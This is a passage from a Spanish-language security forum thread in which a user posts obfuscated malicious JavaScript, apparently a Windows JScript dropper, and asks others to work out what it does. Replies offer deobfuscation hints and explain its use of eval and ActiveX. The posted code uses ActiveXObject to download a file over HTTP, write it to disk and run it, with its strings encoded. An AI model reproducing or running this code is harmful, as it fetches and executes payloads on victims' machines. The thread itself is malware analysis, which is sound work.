  315.        mgwqa: 491,
  316.        fnhs: 928,
  317.        oob: "Y",
  318.        fdjm: 225,
  319.        rdpeg: "Wlbe",
  320.        qhmy: 945,
  321.        pnv: "30000",
  322.        mxnu: "Bhnem",
  323.        qct: "M",
  324.        puokp: "283"
  325.    },
  326.    zhi = ["i", "n", "Jkh", 993, 415, "597"],
  327.    niu = {
  328.        sjmkx: "%",
  329.        fsvd: "r",
  330.        mxq: "f",
  331.        suy: "F",
  332.        wxjh: "l",
  333.        lvg: "j",
  334.        tgy: "Jxqf",
  335.        fih: "S",
  336.        mywhk: "c",
  337.        uneo: "A",
  338.        tyscc: 331,
  339.        chz: 885,
  340.        cviwo: "Bavuc",
  341.        grk: "!",
  342.        otvcq: "Sdyw",
  343.        bkypx: "Jmn",
  344.        rap: 558,
  345.        kpfgu: 965
  346.    },
  347.    rwnw = {
  348.        soqvz: 690,
  349.        jpjv: "Ipgkx",
  350.        nqnk: "Xguxt",
  351.        jurt: 966,
  352.        tzdmn: 187,
  353.        wozz: "Jxmg",
  354.        qxlpk: "Twrj",
  355.        kfc: "J",
  356.        slevm: "C",
  357.        nfgwb: 918,
  358.        ohz: "Hwqrt",
  359.        xnrh: "Ajx",
  360.        mgi: "J",
  361.        punj: 364,
  362.        uey: "2",
  363.        jrkzz: 664
  364.    },
  365.    put = {
  366.        ibb: 68,
  367.        poihe: "t",
  368.        tsf: "\\",
  369.        begwe: "H",
  370.        sxwc: 115,
  371.        tzxjt: "s",
  372.        xqor: "*",
  373.        bbf: "ActiveXObject",
  374.        qcx: "F",
  375.        dzy: "V",
  376.        pjb: "7619",
  377.        pmged: "*",
  378.        wvduv: "K",
  379.        ifbd: "Iqxpc",
  380.        hykw: "d",
  381.        pgt: "F",
  382.        cvi: 848
  383.    },
  384.    kfo = {
  385.        krrxd: "(",
  386.        tbcl: 507,
  387.        tlxoz: "X",
  388.        amo: "Tos",
  389.        amuzg: " ",
  390.        zns: "A",
  391.        zvqln: 14,
  392.        cocmt: "Yrcje",
  393.        kstve: 278
  394.    },
  395.    lcza = [-597],
  396.    ymdeu = [289],
  397.    hkjyt = [],
  398.    bigjj = [7],
  399.    ahunl = [];
  400. ahunl[0] = wmnhg("deoLbw$Aca_");
  401. for (var nngl = [0], ael = [mizvs("ZbvNEXgH))f")], hdqk = !1, ephrk = bsqoi(pgig(")g.6j1Xt^rKI5")), xeu = eval(sekmh("2oO25X_m7:+z") + ephrk + vme("n*&xINca.4m,0")), faefr = ActiveXObject, dykkd = bsqoi(aic("&96t3k-uvdL.DE")), lye = 0; lye < ahunl[thk("W%JCQ3myM01ki4Z")]; lye++) {
  402.    var gzsn = bsqoi(padva("uHY$X1ghzz^gIp*")),
  403.        hre = new faefr(dykkd + fqlvs("R2GC6!mM(:,^7") + gzsn + thpfk("cc5cN6kL%n%Af"));
  404.    try {
  405.        var xvxb = hre[eda("+L01EvS-k2gNj")](2),
  406.            nco = new faefr(vupzg("Gb&;CYxSb-")),
  407.            cbic = 3e4,
  408.            dslh = 6e4,
  409.            phyg = 3e4,
  410.            ncz = 12e5;
  411.        nco[ilgq("2.ddPpkd%%")](cbic, dslh, phyg, ncz);
  412.        try {
  413.            for (; fpu("Pv^D4gcfmo8");) {
  414.                var voyg = azqp();
  415.                if (voyg[lqlrb("0,IH_$wKM51b)E")](cwk(".-Q(jqSKfQ$)Z"), plh("8D2w0E*D*bG"), !1), voyg[yorid("9^($osbnH1f*aLL")](), 200 != voyg[yhinm("QS9EhlGR2:u4e")]) break
  416.            }
  417.        } catch (n) {}
  418.        if (5 == nngl[lye]) {
  419.            var umjf = xeu[nla("ZbsKQkX582TO")],
  420.                row = umjf[nof("VHNyeMELz%Sm^Nn")](0, umjf[mrfu("sz+7M6Su,!@QH.l")] - 3);
  421.            ahunl[lye] += row
  422.        }
  423.        xvxb += frt("9@O_6.t^e_Ux80"), xvxb += ael[lye];
  424.        var mlh = 5;
  425.        do {
  426.            nco[ksp("U6uOcmHDTV")](vgjl("v2iV$^O:geUD@"), ahunl[lye], 0), nco[twy("ME(bHjfii,C!yv")](), mlh--
  427.        } while (200 != nco[ujgwe("S1E7.*Hnj8TZ")] && mlh);
  428.        if (200 == nco[yzzhd("P(SlasP2Ik7")]) {
  429.            var ozefl = new faefr(yhiwo("Uo$Mu;z!!:2D") + ephrk + yjf("xe5LT.($QI"));
  430.            if (8 == nngl[lye] && (nngl[lye] = 0), nngl[lye] <= 3) {
  431.                var dzpj = new faefr(zxoum("a6XKUWTxbiy3AZ("));
  432.                dzpj[pcf("!9w9oSyDg)(e0")](), dzpj[mipjn("zKCmP;87XLBfq:S")] = 1, dzpj[sehl("C8DnpB4%x@-8j*R")] = 0, dzpj[ssdie("W1IZ@l%z-P")](nco[nlc("PchLD7hONF53")]), dzpj[mkwm("nl4zGi!QzjC;V")](xvxb), dzpj[rvl("6-OC&xsf60(t7")](), nngl[lye] || ozefl[axvhz("n(LZAZLoC)r")](bsqoi(wzuge("1vqBn*0MR)z")) + qyno("@L&E^tromug") + bsqoi(wnpk("k(@h%.q!aTO84X")) + zgmt(":dIflb($+-Z7!!!") + xvxb, 0, 0)
  433.            }
  434.        }
  435.    } catch (n) {}
  436. }
  437.  
  438.  


saludos Flamer y a ver quien me ayuda o le na se la carcomita de que hace este codigo

MOD: URL modificada para evitar clicks indeseados.
« Última modificación: 29 Julio 2018, 21:54 pm por MCKSys Argentina » En línea

Mi Canal De Youtube y Blog

https://elblogdeflamer.blogspot.com

engel lex
Moderador Global
***
Desconectado Desconectado

Mensajes: 15.514



Ver Perfil
Re: descifrar codigo de un virus js
« Respuesta #1 en: 22 Julio 2018, 06:34 am »

estos son fastidiosos analizarlos... pero no es tan complicado...


lo que tienes que hacer es cargar a memoria las variables (cuidando no ejecutar codigo a menos que sea necesario) luego ver el contenido de las funciones... pista... en casi todas las funciones iniciales la "n" es solo un despiste
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
XKC

Desconectado Desconectado

Mensajes: 128



Ver Perfil
Re: descifrar codigo de un virus js
« Respuesta #2 en: 28 Julio 2018, 23:32 pm »

FUf, tiene pinta jodida, pero ya que presentas esto me gustaria aclarar unas dudas.
Poque muchos archivos contienen uporque entreuna y otra se va a quedar sin casa, es
n codigo js como malicioso, es decir, javascript se supone que se ejecuta en el navegador, pero si yo me descargo un archivo js y le doy doble click, eso donde se ajecuta?No puede acceder al SO y crear ficheros, editar registro como un exe, ¿o si?
Post data:
Cual es el codigo js que se utiliza para hacer que el navegador descargue un zip como aqui?, digo en segundo plano, no haciendo una redireccion de la pantalla, es decir que te aparezca(o no) la ventana de guardar archivo sin que s epierda lo que estas viendo.
Un saludo.
En línea

Para poder atacar y vencer con seguridad, ataca donde ellos no puedan defenderse.
Para defenderte y resistir firme, defiéndete en donde ellos no atacarán.
gundream

Desconectado Desconectado

Mensajes: 10


Ver Perfil
Re: descifrar codigo de un virus js
« Respuesta #3 en: 31 Octubre 2018, 21:29 pm »

A ver... está ofuscado... ¿ves todas esas variables del principio que tienen nombres cortos? Pues son pedacitos de instrucciones que se ejecutan en las instrucciones EVAL que ves al final. Dentro del EVAL se llaman a esas variables para crear una cadena que se interpreta como una instrucción.

Por ahí hay alguna cosilla que llama a un ActiveX, así que supongo que aprovecha vulnerabilidades del navegador para obligarlo a ejecutar esos comandos construidos con las variables de arriba.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
descifrar codigo
Criptografía
bladewar 0 5,415 Último mensaje 7 Abril 2013, 20:24 pm
por bladewar
[AYUDA-VBS] Para descifrar este virus
Análisis y Diseño de Malware
danny920825 3 3,730 Último mensaje 21 Diciembre 2013, 08:08 am
por danny920825
Descifrar codigo web
Hacking
jhone187 5 5,904 Último mensaje 2 Diciembre 2014, 21:55 pm
por jhone187
descifrar virus .wsf
Scripting
**Aincrad** 2 3,333 Último mensaje 9 Agosto 2017, 18:27 pm
por tincopasan
descifrar virus (.vbs)
Análisis y Diseño de Malware
**Aincrad** 5 6,220 Último mensaje 22 Octubre 2017, 18:43 pm
por **Aincrad**
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines